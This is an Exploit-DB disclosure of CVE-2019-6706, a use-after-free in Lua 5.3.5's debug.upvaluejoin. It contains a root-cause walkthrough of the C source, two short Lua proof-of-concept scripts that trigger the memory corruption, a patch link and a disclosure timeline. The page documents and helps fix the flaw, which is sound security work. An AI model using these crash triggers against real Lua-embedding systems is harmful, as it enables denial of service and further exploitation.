Lua 5.3.5 - 'debug.upvaluejoin' Use After Free

EDB-ID:

46246




Platform:

Multiple

Date:

2019-01-25


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux , the course required to become an Offensive Security Certified Professional (OSCP)

GET CERTIFIED

# Exploit Title: Lua 5.3.5
# Exploit Author: Fady Mohamed Osman (https://twitter.com/fady_othman)
# Exploit-db : http://www.exploit-db.com/author/?a=2986
# Blog : https://blog.fadyothman.com/
# Date: Jan. 10th 2019
# Vendor Homepage: https://www.lua.org/
# Software Link: https://www.lua.org/ftp/lua-5.3.5.tar.gz
# Version: 5.3.5
# CVE ID: CVE-2019-6706

During a fuzz session using "AFL", I found a heap use after free in lua
5.3.5, after analysis of the crash I found the root cause of the
vulnerability, here's the details.

The function `lua_upvaluejoin` in file lapi.c at line 1287 suffers from a
use after free bug when supplied the same function for parameter f1 and f2
and the same upvalue index, additionally I found that the bug is only
triggered when the upvalue is closed, this happens because the
`luaC_upvdeccount` function found in file lgc.c at line 678 will decrement
the refcount and then free the upvalue if the refcount is zero and if the
upvalue is closed.
See the comments below for more explanation.
--------------
LUA_API void lua_upvaluejoin (lua_State *L, int fidx1, int n1,
                                            int fidx2, int n2) {
  LClosure *f1;
  UpVal **up1 = getupvalref(L, fidx1, n1, &f1);
  UpVal **up2 = getupvalref(L, fidx2, n2, NULL);
  luaC_upvdeccount(L, *up1);      //Will delete up1
  *up1 = *up2;     //up1 is up2 because it's the same upvalue and now it's
freed.
  (*up1)->refcount++;   //up1 is freed, yet it's used here.
  if (upisopen(*up1)) (*up1)->u.open.touched = 1;
  luaC_upvalbarrier(L, *up1);
}
--------------

- To trigger the bug simply use a lua program like this (this one will
crash):
--
f=load(function() end)
interesting={}
interesting[0]=string.rep("A",512)
debug.upvaluejoin(f,1,f,1)
---

- Another program that will not crash (unless you compile with
-fsanitize=address):
---
function w()
local x = {}
f = function() print(x) end
end
w()
debug.upvaluejoin(f,2,f,2)
---

If you want a fix you can use the patch provided here:
http://lua.2524044.n2.nabble.com/CVE-2019-6706-use-after-free-in-lua-upvaluejoin-function-tc7685575.html


Timeline:
- Jan 10th 2019 : Vulnerability discovered and reported to lua mailing list.
- Jan 23rd 2019 : CVE Identifier obtained.
- Jan 25th 2019 : Fix is suggested by Matěj Cepl.

Refrences:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6706
https://security-tracker.debian.org/tracker/CVE-2019-6706
https://vuldb.com/?id.130228